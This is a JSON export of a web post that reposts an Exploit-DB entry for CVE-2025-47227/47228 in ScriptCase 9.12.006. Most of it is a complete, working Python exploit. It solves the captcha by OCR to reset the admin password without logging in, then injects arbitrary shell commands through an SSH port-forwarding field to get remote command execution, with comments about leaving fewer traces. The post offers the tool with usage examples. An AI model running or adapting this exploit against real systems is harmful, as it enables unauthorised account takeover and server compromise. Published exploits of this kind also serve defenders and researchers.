{"id":7823,"date":"2025-07-08T13:35:34","date_gmt":"2025-07-08T13:35:34","guid":{"rendered":"http:\/\/localhost\/?p=7823"},"modified":"2025-07-08T13:35:34","modified_gmt":"2025-07-08T13:35:34","slug":"scriptcase-912006-23-remote-command-execution-rce","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=7823","title":{"rendered":"ScriptCase 9.12.006 (23) &#8211; Remote Command Execution (RCE)"},"content":{"rendered":"<h2>Exploit Details<\/h2>\n<h3>Basic Information<\/h3>\n<table style=\"width:100%; border-collapse: collapse; margin-bottom: 20px;\">\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Exploit Title<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\">ScriptCase 9.12.006 (23) &#8211; Remote Command Execution (RCE)<\/td>\n<\/tr>\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Exploit ID<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\">EDB-ID:52353<\/td>\n<\/tr>\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Type<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\">exploitdb<\/td>\n<\/tr>\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Published<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\">2025-07-08T00:00:00<\/td>\n<\/tr>\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Modified<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\">2025-07-08T00:00:00<\/td>\n<\/tr>\n<\/table>\n<h3>CVSS Information<\/h3>\n<table style=\"width:100%; border-collapse: collapse; margin-bottom: 20px;\">\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">CVSS Score<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\">7.5<\/td>\n<\/tr>\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Severity<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd; color: #ff4444; font-weight: bold;\">HIGH<\/td>\n<\/tr>\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Vector<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\">CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:N\/I:H\/A:N<\/td>\n<\/tr>\n<\/table>\n<h3>CVE Information<\/h3>\n<div style=\" padding: 15px; border: 1px solid #ddd; margin-bottom: 20px;\">\n<ul style=\"margin: 0; padding-left: 20px;\">\n<li>CVE-2025-47227<\/li>\n<li>CVE-2025-47228<\/li>\n<\/ul>\n<\/div>\n<h3>Exploit Description<\/h3>\n<div style=\" padding: 15px; border-left: 4px solid #4CAF50; margin-bottom: 20px;\">\nExploit Title: ScriptCase 9.12.006 (23) &#8211; Remote Command&#8230;\n<\/div>\n<h3>Exploit Code<\/h3>\n<div style=\" color: #d4d4d4; padding: 15px; border: 1px solid #ddd; margin-bottom: 20px; font-family: 'Courier New', monospace; white-space: pre-wrap; overflow-x: auto;\">\n# Exploit Title: ScriptCase 9.12.006 (23) &#8211; Remote Command Execution (RCE)<br \/>\n<br \/># Date: 04\/07\/2025<br \/>\n<br \/># Exploit Author: Alexandre ZANNI (noraj) &#038; Alexandre DROULL\u00c9 (cabir)<br \/>\n<br \/># Vendor Homepage: https:\/\/www.scriptcase.net\/<br \/>\n<br \/># Software Link: https:\/\/www.scriptcase.net\/download\/<br \/>\n<br \/># Version: 1.0.003-build-2 (Production Environment) \/ 9.12.006 (23) (ScriptCase)<br \/>\n<br \/># Tested on: EndeavourOS<br \/>\n<br \/># CVE : CVE-2025-47227, CVE-2025-47228<br \/>\n<br \/># Source: https:\/\/github.com\/synacktiv\/CVE-2025-47227_CVE-2025-47228<br \/>\n<br \/># Advisory: https:\/\/www.synacktiv.com\/advisories\/scriptcase-pre-authenticated-remote-command-execution<\/p>\n<p># Imports<br \/>\n<br \/>## stdlib<br \/>\n<br \/>import io<br \/>\n<br \/>import random<br \/>\n<br \/>import optparse<br \/>\n<br \/>import re<br \/>\n<br \/>import string<br \/>\n<br \/>import sys<br \/>\n<br \/>import urllib.parse<br \/>\n<br \/>## third party<br \/>\n<br \/>from PIL import Image, ImageEnhance, ImageFilter # pip3 install Pillow<br \/>\n<br \/>import pytesseract # pip3 install pytesseract<br \/>\n<br \/>import requests # pip install requests<br \/>\n<br \/>from bs4 import BeautifulSoup # pip install beautifulsoup4<\/p>\n<p># Clean image + OCR<br \/>\n<br \/>def process_image(input_image, output_image_path=None):<br \/>\n<br \/>    # Open the image<br \/>\n<br \/>    img = Image.open(io.BytesIO(input_image))<\/p>\n<p>    # Convert the image to RGB (in case it&#8217;s in a different mode)<br \/>\n<br \/>    img = img.convert(&#8216;RGB&#8217;)<\/p>\n<p>    # Load the pixel data<br \/>\n<br \/>    pixels = img.load()<\/p>\n<p>    # Get the dimensions of the image<br \/>\n<br \/>    width, height = img.size<\/p>\n<p>    # Process each pixel<br \/>\n<br \/>    for y in range(height):<br \/>\n<br \/>        for x in range(width):<br \/>\n<br \/>            r, g, b = pixels[x, y]<br \/>\n<br \/>            # Change the crap background to a fixed color (letters are only black or white, and background is random color but not black or white)<br \/>\n<br \/>            if (r, g, b) != (0, 0, 0) and (r, g, b) != (255, 255, 255):<br \/>\n<br \/>                pixels[x, y] = (211, 211, 211) # Change the pixel to light grey<br \/>\n<br \/>            elif (r, g, b) == (255, 255, 255): # Change white text in black text<br \/>\n<br \/>                pixels[x, y] = (0, 0, 0) # Change the pixel to black<\/p>\n<p>    # Size (200, 50) * 5<br \/>\n<br \/>    img = img.resize((1000,250), Image.Resampling.HAMMING)<\/p>\n<p>    # Use Tesseract to convert the image to text<br \/>\n<br \/>    # psm 6 or 8 work best<br \/>\n<br \/>    # limit alphabet<br \/>\n<br \/>    # disable word optimized detection https:\/\/github.com\/tesseract-ocr\/tessdoc\/blob\/main\/ImproveQuality.md#dictionaries-word-lists-and-patterns<br \/>\n<br \/>    custom_oem_psm_config = rf&#8217;&#8211;psm 8 &#8211;oem 3 -c tessedit_char_whitelist={string.ascii_letters} -c load_system_dawg=false -c load_freq_dawg=false &#8211;dpi 300&#8242; # there are only uppercase but keep lowercase to avoid false negative<br \/>\n<br \/>    text = pytesseract.image_to_string(img, config=custom_oem_psm_config)<br \/>\n<br \/>    return(text.upper().strip()) # convert false positive lowercase to uppercase, strip because leading whitespace is often added<\/p>\n<p># Step 1: Set is_page to true on the session<br \/>\n<br \/>def prepare_session(url_base, cookies):<br \/>\n<br \/>    res = requests.get(<br \/>\n<br \/>        f'{url_base}\/prod\/lib\/php\/devel\/iface\/login.php&#8217;,<br \/>\n<br \/>        cookies=cookies,<br \/>\n<br \/>        verify=False<br \/>\n<br \/>    )<br \/>\n<br \/>    if res.status_code == 200:<br \/>\n<br \/>        print(&#8220;[+] Session prepared&#8221;)<br \/>\n<br \/>    else:<br \/>\n<br \/>        print(f&#8221;[-] Failed with status code {res.status_code}&#8221;)<\/p>\n<p># Random hex string of arbitrary size<br \/>\n<br \/>def rand_hex(size):<br \/>\n<br \/>    return &#8221;.join(random.choice(&#8216;0123456789abcdef&#8217;) for _ in range(size))<\/p>\n<p># Step 2: Get a captcha challenge for the session<br \/>\n<br \/>def captcha_session(url_base, cookies):<br \/>\n<br \/>    res = requests.get(<br \/>\n<br \/>        f'{url_base}\/prod\/lib\/php\/devel\/lib\/php\/secureimage.php&#8217;,<br \/>\n<br \/>        cookies=cookies,<br \/>\n<br \/>        verify=False<br \/>\n<br \/>    )<br \/>\n<br \/>    if res.status_code == 200:<br \/>\n<br \/>        print(&#8220;[+] Captcha retrieved&#8221;)<br \/>\n<br \/>        return res.content<br \/>\n<br \/>    else:<br \/>\n<br \/>        print(f&#8221;[-] Failed with status code {res.status_code}&#8221;)<\/p>\n<p># Step 3: Change the password with the prepared session<br \/>\n<br \/>def reset_password(url_base, cookies, captcha_img, captcha_txt):<br \/>\n<br \/>    new_password = random.choice(string.ascii_letters).capitalize() + rand_hex(10) + str(random.randint(0,9))<br \/>\n<br \/>    email = f'{rand_hex(10)}@{rand_hex(8)}.com&#8217;<br \/>\n<br \/>    data = {<br \/>\n<br \/>        &#8216;ajax&#8217;: &#8216;nm&#8217;,<br \/>\n<br \/>        &#8216;nm_action&#8217;: &#8216;change_pass&#8217;,<br \/>\n<br \/>        &#8217;email&#8217;: email,<br \/>\n<br \/>        &#8216;pass_new&#8217;: new_password,<br \/>\n<br \/>        &#8216;pass_conf&#8217;: new_password,<br \/>\n<br \/>        &#8216;lang&#8217;: &#8216;en-us&#8217;,<br \/>\n<br \/>        &#8216;captcha&#8217;: captcha_txt<br \/>\n<br \/>    }<br \/>\n<br \/>    res = requests.post(<br \/>\n<br \/>        f'{url_base}\/prod\/lib\/php\/devel\/iface\/login.php&#8217;,<br \/>\n<br \/>        data=data,<br \/>\n<br \/>        cookies=cookies,<br \/>\n<br \/>        verify=False<br \/>\n<br \/>    )<br \/>\n<br \/>    if res.status_code == 200 and res.text == &#8216;{&#8220;result&#8221;:&#8221;success&#8221;}&#8217;:<br \/>\n<br \/>        print(&#8220;[+] Password reset successfully&#8221;)<br \/>\n<br \/>        print(f&#8221;[+] The new password is: {new_password}&#8221;)<br \/>\n<br \/>        print(f&#8221;[+] The delcared (fake) email address was: {email}&#8221;)<br \/>\n<br \/>    elif res.status_code == 200 and res.text == &#8216;{&#8220;result&#8221;:&#8221;error&#8221;,&#8221;message&#8221;:&#8221;Invalid captcha&#8221;}&#8217;:<br \/>\n<br \/>        print(&#8220;[-] OCR failed&#8221;)<br \/>\n<br \/>        print(f&#8221;[-] Failed captcha submission was {captcha_txt}&#8221;)<br \/>\n<br \/>        img = Image.open(io.BytesIO(captcha_img))<br \/>\n<br \/>        img.show()<br \/>\n<br \/>        manual_input = input(&#8220;[+] Input displayed captcha to retry manually: &#8220;)<br \/>\n<br \/>        reset_password(url_base, cookies, captcha_img, manual_input)<br \/>\n<br \/>    elif res.status_code == 200 and res.text == &#8216;{&#8220;result&#8221;:&#8221;error&#8221;,&#8221;message&#8221;:&#8221;The password is incorrect.&#8221;}&#8217;:<br \/>\n<br \/>        print(&#8220;[-] Non default password policy&#8221;)<br \/>\n<br \/>        print(&#8220;[-] Hardcode a password that matches it&#8221;)<br \/>\n<br \/>        print(f&#8221;[-] Failed password is: {new_password}&#8221;)<br \/>\n<br \/>    else:<br \/>\n<br \/>        print(f&#8221;[-] Failed with status code {res.status_code}&#8221;)<br \/>\n<br \/>        print(res.text)<br \/>\n<br \/>        print(&#8216;[-] Data was:&#8217;)<br \/>\n<br \/>        print(data)<\/p>\n<p># Detect the deployment path of ScriptCase and produciton environment from the homepage.<br \/>\n<br \/># E.g. deployment path is \/scriptcase\/<br \/>\n<br \/># sc_pathToTB variable on http:\/\/10.58.8.213\/ will be &#8216;\/scriptcase\/prod\/third\/jquery_plugin\/thickbox\/&#8217;<br \/>\n<br \/># ScriptCase login page => http:\/\/10.58.8.213\/scriptcase\/devel\/iface\/login.php<br \/>\n<br \/># Production Environment login page => http:\/\/10.58.8.213\/scriptcase\/prod\/lib\/php\/devel\/iface\/login.php<br \/>\n<br \/>def detect_deployment_path(homepage_url):<br \/>\n<br \/>    res = requests.get(homepage_url, verify=False) # HTTP redirections are handled automatically (not JS redirects)<br \/>\n<br \/>    if res.status_code == 200:<br \/>\n<br \/>        print(&#8220;[+] Looking for deployment path in JS and computing login paths&#8221;)<br \/>\n<br \/>        reg = r&#8221;var sc_pathToTB = &#8216;(.+)\/prod\/third\/jquery_plugin\/thickbox\/&#8217;;&#8221;<br \/>\n<br \/>        match = re.search(reg, res.text)<br \/>\n<br \/>        # compute URL without path<br \/>\n<br \/>        parsed_url = urllib.parse.urlparse(homepage_url)<br \/>\n<br \/>        homepage_root = f&#8221;{parsed_url.scheme}:\/\/{parsed_url.netloc}&#8221;<br \/>\n<br \/>        if match:<br \/>\n<br \/>            base_path = match.group(1)<br \/>\n<br \/>            print(f&#8221;[+] Deployment path found: {base_path}\/&#8221;)<br \/>\n<br \/>            print(f&#8221;[+] ScriptCase login page: {homepage_root}{base_path}\/devel\/iface\/login.php (probably not deployed on a production environment)&#8221;)<br \/>\n<br \/>            print(f&#8221;[+] Production Environment login page: {homepage_root}{base_path}\/prod\/lib\/php\/devel\/iface\/login.php&#8221;)<br \/>\n<br \/>        else: # either a website not made with ScriptCase or root redirects to the devel page<br \/>\n<br \/>            js_redirect(res)<br \/>\n<br \/>            # try to detect the devel\/iface\/login.php page<br \/>\n<br \/>            reg2 = r&#8217;http:\/\/www\\.scriptcase\\.net|doChangeLanguage|str_lang_user_first&#8217;<br \/>\n<br \/>            match = re.search(reg2, res.text)<br \/>\n<br \/>            if match: # devel page<br \/>\n<br \/>                print(f&#8221;[?] This may be the development console?&#8221;)<br \/>\n<br \/>                # now try to extract path from favicon<br \/>\n<br \/>                reg3 = r&#8217;<link rel=\"shortcut icon\" href=\"(.+)\/devel\/conf\/scriptcase\/img\/ico\/favicon\\.ico\"'\n               match = re.search(reg3, res.text)<br \/>\n<br \/>                if match: # base path found<br \/>\n<br \/>                    base_path = match.group(1)<br \/>\n<br \/>                    print(f&#8221;[+] Deployment path found: {base_path}\/&#8221;)<br \/>\n<br \/>                    print(f&#8221;[+] ScriptCase login page: {homepage_root}{base_path}\/devel\/iface\/login.php&#8221;)<br \/>\n<br \/>                    print(f&#8221;[+] Production Environment login page: {homepage_root}{base_path}\/prod\/lib\/php\/devel\/iface\/login.php&#8221;)<br \/>\n<br \/>                else: # false positive, it&#8217;s not devel page<br \/>\n<br \/>                    print(f&#8221;[-] Failed to find deployment path, is this site made with ScriptCase?&#8221;)<br \/>\n<br \/>            else: # no ScriptCase detected<br \/>\n<br \/>                print(&#8220;[-] Failed to find deployment path, is this site made with ScriptCase?&#8221;)<br \/>\n<br \/>    else:<br \/>\n<br \/>        print(f&#8221;[-] Failed with status code {res.status_code}&#8221;)<\/p>\n<p># Try to handle JS redirect else warn and exit<br \/>\n<br \/>def js_redirect(res):<br \/>\n<br \/>    if re.search(r&#8217;window\\.location&#8217;, res.text):<br \/>\n<br \/>        print(&#8216;[-] JavaScript redirection detected&#8217;)<br \/>\n<br \/>        print(&#8216;[-] JavaScript redirection not handled (no headless browser with JS engine)&#8217;)<br \/>\n<br \/>        print(f&#8221;[-] Returned page is:\\n{res.text}&#8221;)<br \/>\n<br \/>        print(f&#8221;[-] Last redirection URL is:\\n{res.url}&#8221;)<br \/>\n<br \/>        match = re.search(r&#8221;window\\.location\\s*=\\s*[&#8216;\\&#8221;](.+)[&#8216;\\&#8221;]&#8221;, res.text)<br \/>\n<br \/>        if match:<br \/>\n<br \/>            redirect_url = f&#8221;{res.url}\/{match.group(1)}&#8221;<br \/>\n<br \/>            print(f&#8221;[?] Let&#8217;s try again with: {redirect_url}&#8221;)<br \/>\n<br \/>            detect_deployment_path(redirect_url)<br \/>\n<br \/>        else:<br \/>\n<br \/>            print(&#8216;Please try again with redirect URL&#8217;)<br \/>\n<br \/>            exit(1)<\/p>\n<p># Remote command execution on the system<br \/>\n<br \/>#<br \/>\n<br \/># Instead of registering a new connection (admin_sys_allconections_create_wizard.php), we can just test it<br \/>\n<br \/># (admin_sys_allconections_test.php) so we leave less traces.<br \/>\n<br \/># Even if the test results in &#8220;Connection Error&#8221; \/ &#8220;Unable to connect&#8221;, the command was stil lexecuted.<br \/>\n<br \/>def command_injection(url_base, cookies, cmd):<br \/>\n<br \/>    data = {<br \/>\n<br \/>        &#8216;hid_create_connect&#8217;: &#8216;S&#8217;,<br \/>\n<br \/>        &#8216;dbms&#8217;: &#8216;mysql&#8217;,<br \/>\n<br \/>        &#8216;conn&#8217;: &#8216;conn_mysql&#8217;,<br \/>\n<br \/>        &#8216;dbms&#8217;: &#8216;pdo_mysql&#8217;,<br \/>\n<br \/>        &#8216;host&#8217;: &#8216;127.0.0.1:3306&#8217;,<br \/>\n<br \/>        &#8216;server&#8217;: &#8216;127.0.0.1&#8217;,<br \/>\n<br \/>        &#8216;port&#8217;: &#8216;3306&#8217;,<br \/>\n<br \/>        &#8216;user&#8217;: rand_hex(11),<br \/>\n<br \/>        &#8216;pass&#8217;: rand_hex(8),<br \/>\n<br \/>        &#8216;show_table&#8217;: &#8216;Y&#8217;,<br \/>\n<br \/>        &#8216;show_view&#8217;: &#8216;Y&#8217;,<br \/>\n<br \/>        &#8216;show_system&#8217;: &#8216;Y&#8217;,<br \/>\n<br \/>        &#8216;show_procedure&#8217;: &#8216;Y&#8217;,<br \/>\n<br \/>        &#8216;decimal&#8217;: &#8216;.&#8217;,<br \/>\n<br \/>        &#8216;use_persistent&#8217;: &#8216;N&#8217;,<br \/>\n<br \/>        &#8216;use_schema&#8217;: &#8216;N&#8217;,<br \/>\n<br \/>        &#8216;retrieve_schema&#8217;: &#8216;Y&#8217;,<br \/>\n<br \/>        &#8216;retrieve_schema&#8217;: &#8216;Y&#8217;,<br \/>\n<br \/>        &#8216;use_ssh&#8217;: &#8216;Y&#8217;,<br \/>\n<br \/>        &#8216;ssh_server&#8217;: &#8216;127.0.0.1&#8217;,<br \/>\n<br \/>        &#8216;ssh_user&#8217;: &#8216;root&#8217;,<br \/>\n<br \/>        &#8216;ssh_port&#8217;: &#8217;22&#8217;,<br \/>\n<br \/>        &#8216;ssh_localportforwarding&#8217;: f&#8217;; {cmd};#&#8217;,<br \/>\n<br \/>        &#8216;ssh_localserver&#8217;: &#8216;127.0.0.1&#8217;,<br \/>\n<br \/>        &#8216;ssh_localport&#8217;: &#8216;3306&#8217;,<br \/>\n<br \/>        &#8216;form_create&#8217;: form_create(url_base, cookies),<br \/>\n<br \/>        &#8216;retornar&#8217;: &#8216;Back&#8217;,<br \/>\n<br \/>        &#8216;concluir&#8217;: &#8216;Save&#8217;,<br \/>\n<br \/>        &#8216;confirmar&#8217;: &#8216;Back&#8217;,<br \/>\n<br \/>        &#8216;voltar&#8217;: &#8216;Confirm&#8217;,<br \/>\n<br \/>        &#8216;step&#8217;: &#8216;sgdb2&#8217;,<br \/>\n<br \/>        &#8216;nextstep&#8217;: &#8216;dados_rep&#8217;<br \/>\n<br \/>    }<br \/>\n<br \/>    res = requests.post(<br \/>\n<br \/>        f'{url_base}\/prod\/lib\/php\/devel\/iface\/admin_sys_allconections_test.php&#8217;,<br \/>\n<br \/>        data=data,<br \/>\n<br \/>        cookies=cookies,<br \/>\n<br \/>        verify=False<br \/>\n<br \/>    )<br \/>\n<br \/>    if res.status_code == 200:<br \/>\n<br \/>        print(&#8220;[+] Command executed (blind)&#8221;)<br \/>\n<br \/>    else:<br \/>\n<br \/>        print(f&#8221;[-] Failed with status code {res.status_code}&#8221;)<br \/>\n<br \/>        exit(1)<\/p>\n<p># Get form_create ID for command_injection()<br \/>\n<br \/>def form_create(url_base, cookies):<br \/>\n<br \/>    res = requests.get(<br \/>\n<br \/>        f'{url_base}\/prod\/lib\/php\/devel\/iface\/admin_sys_allconections_create_wizard.php&#8217;,<br \/>\n<br \/>        cookies=cookies,<br \/>\n<br \/>        verify=False<br \/>\n<br \/>    )<br \/>\n<br \/>    if res.status_code == 200:<br \/>\n<br \/>        print(&#8220;[+] Parsing results to find form_create ID&#8221;)<br \/>\n<br \/>        soup = BeautifulSoup(res.text, &#8216;html.parser&#8217;)<br \/>\n<br \/>        form_create = soup.css.select_one(&#8216;html body.nmPage form input[name=&#8221;form_create&#8221;]&#8217;)<br \/>\n<br \/>        if form_create:<br \/>\n<br \/>            form_create_id = form_create.get(&#8216;value&#8217;)<br \/>\n<br \/>            print(f&#8221;[+] form_create ID found: {form_create_id}&#8221;)<br \/>\n<br \/>            return form_create_id<br \/>\n<br \/>        else:<br \/>\n<br \/>            print(&#8220;[-] No form_create ID found&#8221;)<br \/>\n<br \/>            exit(1)<br \/>\n<br \/>        return res.content<br \/>\n<br \/>    else:<br \/>\n<br \/>        print(f&#8221;[-] Failed with status code {res.status_code}&#8221;)<br \/>\n<br \/>        exit(1)<\/p>\n<p># Handles login<br \/>\n<br \/>#<br \/>\n<br \/># Comes with a cookie as there is session fixation (cookie not renewed after login)<br \/>\n<br \/>def login(url_base, cookies, password):<br \/>\n<br \/>    data = {<br \/>\n<br \/>        &#8216;option&#8217;: &#8216;login&#8217;,<br \/>\n<br \/>        &#8216;opt_par&#8217;: None,<br \/>\n<br \/>        &#8216;hid_login&#8217;: &#8216;S&#8217;,<br \/>\n<br \/>        &#8216;field_pass&#8217;: password,<br \/>\n<br \/>        &#8216;field_language&#8217;: &#8216;en-us&#8217;<br \/>\n<br \/>    }<br \/>\n<br \/>    res = requests.post(<br \/>\n<br \/>        f'{url_base}\/prod\/lib\/php\/nm_ini_manager2.php&#8217;,<br \/>\n<br \/>        data=data,<br \/>\n<br \/>        cookies=cookies,<br \/>\n<br \/>        verify=False<br \/>\n<br \/>    )<br \/>\n<br \/>    if res.status_code == 200:<br \/>\n<br \/>        print(&#8220;[+] Authentication successful&#8221;)<br \/>\n<br \/>    else:<br \/>\n<br \/>        print(&#8220;[-] Authentication failed&#8221;)<\/p>\n<p># Exploit<br \/>\n<br \/>if __name__ == &#8216;__main__&#8217;:<br \/>\n<br \/>    help_text = &#8220;&#8221;&#8221;<br \/>\n<br \/>    Examples:<\/p>\n<p>    Pre-Auth RCE (password reset + RCE)<br \/>\n<br \/>        python exploit.py -u http:\/\/example.org\/scriptcase -c &#8220;command&#8221;<br \/>\n<br \/>    Password reset only (no auth)<br \/>\n<br \/>        python exploit.py -u http:\/\/example.org\/scriptcase<br \/>\n<br \/>    RCE only (need account)<br \/>\n<br \/>        python exploit.py -u http:\/\/example.org\/scriptcase -c &#8220;command&#8221; -p &#8216;Password123*&#8217;<br \/>\n<br \/>    Detect deployment path<br \/>\n<br \/>        python exploit.py -u http:\/\/example.org\/ -d<br \/>\n<br \/>    &#8220;&#8221;&#8221;<br \/>\n<br \/>    parser = optparse.OptionParser(usage=help_text)<br \/>\n<br \/>    parser.add_option(&#8216;-u&#8217;, &#8216;&#8211;base-url&#8217;)<br \/>\n<br \/>    parser.add_option(&#8216;-c&#8217;, &#8216;&#8211;command&#8217;)<br \/>\n<br \/>    parser.add_option(&#8216;-p&#8217;, &#8216;&#8211;password&#8217;)<br \/>\n<br \/>    parser.add_option(&#8216;-d&#8217;, &#8216;&#8211;detect&#8217;, action=&#8217;store_true&#8217;, dest=&#8217;detect&#8217;)<br \/>\n<br \/>    opts, args = parser.parse_args()<\/p>\n<p>    cookies = {<br \/>\n<br \/>        &#8216;PHPSESSID&#8217;: rand_hex(26) # Simulate a random PHPSESSID (more stealth than an arbitrary string)<br \/>\n<br \/>    }<br \/>\n<br \/>    URL_BASE = opts.base_url<\/p>\n<p>    if opts.base_url and opts.command and not opts.password and not opts.detect: # Pre-Auth RCE (password reset + RCE)<br \/>\n<br \/>        prepare_session(URL_BASE, cookies)<br \/>\n<br \/>        captcha_img = captcha_session(URL_BASE, cookies)<br \/>\n<br \/>        captcha_txt = process_image(captcha_img)<br \/>\n<br \/>        reset_password(URL_BASE, cookies, captcha_img, captcha_txt)<br \/>\n<br \/>        command_injection(URL_BASE, cookies, opts.command)<br \/>\n<br \/>    elif opts.base_url and not opts.command and not opts.password and not opts.detect: # Password reset only (no auth)<br \/>\n<br \/>        prepare_session(URL_BASE, cookies)<br \/>\n<br \/>        captcha_img = captcha_session(URL_BASE, cookies)<br \/>\n<br \/>        captcha_txt = process_image(captcha_img)<br \/>\n<br \/>        reset_password(URL_BASE, cookies, captcha_img, captcha_txt)<br \/>\n<br \/>    elif opts.base_url and opts.command and opts.password and not opts.detect: # RCE only (need account)<br \/>\n<br \/>        prepare_session(URL_BASE, cookies)<br \/>\n<br \/>        login(URL_BASE, cookies, opts.password)<br \/>\n<br \/>        command_injection(URL_BASE, cookies, opts.command)<br \/>\n<br \/>    elif opts.base_url and not opts.command and not opts.password and opts.detect: # Detect deployment path<br \/>\n<br \/>        detect_deployment_path(URL_BASE)<br \/>\n<br \/>    else:<br \/>\n<br \/>        parser.print_help()<br \/>\n<br \/>        sys.exit(1)\n<\/div>\n<p><a href=\"https:\/\/www.exploit-db.com\/exploits\/52353\" target=\"_blank\" style=\"display: inline-block;  color: white; padding: 10px 20px; text-decoration: none; border-radius: 4px;\">View Full Exploit Details<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Exploit Details Basic Information Exploit Title ScriptCase 9.12.006 (23) &#8211; Remote Command Execution (RCE) Exploit ID EDB-ID:52353 Type exploitdb Published 2025-07-08T00:00:00 Modified 2025-07-08T00:00:00 CVSS Information&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,16,12,40,15,13,7,11,5],"class_list":["post-7823","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-75","tag-exploit","tag-exploitdb","tag-high","tag-news","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>ScriptCase 9.12.006 (23) - Remote Command Execution (RCE) - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=7823\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"ScriptCase 9.12.006 (23) - Remote Command Execution (RCE) - zero redgem\" \/>\n<meta property=\"og:description\" content=\"Exploit Details Basic Information Exploit Title ScriptCase 9.12.006 (23) &#8211; Remote Command Execution (RCE) Exploit ID EDB-ID:52353 Type exploitdb Published 2025-07-08T00:00:00 Modified 2025-07-08T00:00:00 CVSS Information...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=7823\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2025-07-08T13:35:34+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"5 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=7823#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=7823\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"ScriptCase 9.12.006 (23) &#8211; Remote Command Execution (RCE)\",\"datePublished\":\"2025-07-08T13:35:34+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=7823\"},\"wordCount\":987,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"CVSS-7.5\",\"exploit\",\"exploitdb\",\"HIGH\",\"news\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=7823#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=7823\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=7823\",\"name\":\"ScriptCase 9.12.006 (23) - Remote Command Execution (RCE) - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2025-07-08T13:35:34+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=7823#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=7823\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=7823#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"ScriptCase 9.12.006 (23) &#8211; Remote Command Execution (RCE)\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero 